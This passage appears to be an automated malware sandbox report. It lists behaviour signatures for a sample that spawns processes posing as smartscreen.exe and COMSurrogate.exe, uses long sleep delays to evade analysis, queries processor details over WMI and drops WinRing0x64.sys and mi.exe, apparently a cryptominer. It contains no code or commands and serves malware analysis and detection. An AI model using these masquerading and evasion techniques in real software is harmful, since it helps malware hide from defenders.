                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1759
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exeWindow / User API: threadDelayed 2683
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exeWindow / User API: threadDelayed 7073
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4432
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 508
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3005
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3388
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 361
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3455
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 821
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1761
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1305
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeWindow / User API: threadDelayed 4420
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeWindow / User API: threadDelayed 5390
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6515
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1547
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeWindow / User API: threadDelayed 4656
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeWindow / User API: threadDelayed 5134
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeWindow / User API: threadDelayed 4625
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeWindow / User API: threadDelayed 5173
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\asm\WinRing0x64.sysJump to dropped file
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\asm\mi.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_18-99777
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrAPI coverage: 4.9 %
                                  Source: C:\Users\user\AppData\Local\Temp\491505\Dr.com TID: 2360Thread sleep time: -44430s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe TID: 6984Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe TID: 4976Thread sleep time: -13835058055282155s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe TID: 6984Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5056Thread sleep count: 5588 > 30
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5056Thread sleep count: 1759 > 30
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6208Thread sleep time: -1844674407370954s >= -30000s
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5160Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exe TID: 5432Thread sleep count: 2683 > 30
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exe TID: 5432Thread sleep time: -2683000s >= -30000s
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exe TID: 1908Thread sleep count: 237 > 30
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exe TID: 1908Thread sleep time: -237000s >= -30000s
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exe TID: 5432Thread sleep count: 7073 > 30
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exe TID: 5432Thread sleep time: -7073000s >= -30000s
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2732Thread sleep count: 4432 > 30
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4900Thread sleep time: -11990383647911201s >= -30000s
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3280Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6820Thread sleep count: 508 > 30
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2748Thread sleep time: -30000s >= -30000s
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6368Thread sleep time: -1844674407370954s >= -30000s
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5340Thread sleep count: 3005 > 30
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2300Thread sleep time: -2767011611056431s >= -30000s
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3972Thread sleep count: 262 > 30
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5944Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1108Thread sleep count: 3388 > 30
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1860Thread sleep time: -9223372036854770s >= -30000s
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1120Thread sleep count: 361 > 30
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6428Thread sleep time: -30000s >= -30000s
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6364Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 796Thread sleep count: 3455 > 30
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2328Thread sleep count: 821 > 30
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1212Thread sleep time: -1844674407370954s >= -30000s
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2456Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3236Thread sleep count: 1761 > 30
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1016Thread sleep time: -1844674407370954s >= -30000s
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1524Thread sleep time: -1844674407370954s >= -30000s
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3552Thread sleep count: 1305 > 30
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3504Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3352Thread sleep count: 283 > 30
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2084Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep count: 33 > 30
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -30437127721620741s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -100000s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -99875s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 4620Thread sleep count: 4420 > 30
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 4620Thread sleep count: 5390 > 30
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -99765s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -99656s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -99546s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -99437s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -99327s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -99215s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -98917s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -98690s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -98561s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -98453s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -98343s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -98228s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -98118s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -98015s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -97904s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -97796s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -97687s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -97578s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -97468s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -97359s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -97239s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -97115s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -96977s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -96868s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -96765s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -96654s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -96546s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -96437s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -96317s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -96161s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -96031s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -95879s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -95750s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -95627s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -95500s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -95390s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -95281s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -95172s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -95047s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -94937s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -94828s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -94718s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -94609s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -94499s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -94390s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -94280s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -94171s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -94061s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -93952s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1492Thread sleep time: -93843s >= -30000s
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5832Thread sleep count: 6515 > 30
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5832Thread sleep count: 1547 > 30
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4576Thread sleep time: -6456360425798339s >= -30000s
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5344Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exe TID: 6864Thread sleep count: 70 > 30
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exe TID: 6864Thread sleep time: -70000s >= -30000s
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exe TID: 5316Thread sleep count: 136 > 30
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exe TID: 5316Thread sleep time: -136000s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep count: 33 > 30
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -30437127721620741s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -100000s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2388Thread sleep count: 4656 > 30
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2388Thread sleep count: 5134 > 30
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -99855s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -99750s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -99640s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -99531s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -99421s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -99312s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -99202s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -99093s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -98984s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -98874s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -98760s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -98656s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -98403s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -98296s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -98071s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -97968s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -97859s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -97750s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -97640s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -97531s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -97418s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -97310s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -97203s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -97093s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -96979s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -96874s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -96765s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -96656s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -96546s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -96437s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -96328s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -96218s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -96109s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -95994s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -95890s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -95764s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -95583s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -95454s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -95328s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -95218s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -95109s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -94999s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -94887s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -94779s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -94670s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -94561s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -94452s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -94343s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 1700Thread sleep time: -94234s >= -30000s
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exe TID: 4800Thread sleep count: 44 > 30
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exe TID: 4800Thread sleep time: -44000s >= -30000s
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exe TID: 3880Thread sleep count: 46 > 30
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exe TID: 3880Thread sleep time: -46000s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -27670116110564310s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -100000s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 4052Thread sleep count: 4625 > 30
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 4052Thread sleep count: 5173 > 30
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -99873s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -99764s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -99656s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -99546s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -99437s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -99328s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -99218s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -99109s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -98999s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -98890s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -98780s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -98671s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -98562s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -98452s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -98343s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -98234s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -98111s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -97953s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -97823s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -97500s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -97265s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -97156s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -97040s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -96922s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -96812s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -96702s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -96593s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -96484s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -96374s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -96265s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -96156s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -96046s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -95937s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -95828s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -95718s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -95603s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -95484s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -95375s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -95265s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -95156s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -95046s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -94934s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -94827s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -94602s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -94484s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -94369s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -94259s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -94147s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -94031s >= -30000s
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe TID: 2524Thread sleep time: -93921s >= -30000s
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * FROM WIN32_Processor
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Users\user\AppData\Local\Temp\491505\Dr.comLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exeLast function: Thread delayed
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exeLast function: Thread delayed
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exeLast function: Thread delayed
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exeLast function: Thread delayed
                                  Source: C:\Users\user\AppData\Local\Temp\491505\Dr.comThread sleep count: Count: 4443 delay: -10Jump to behavior
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
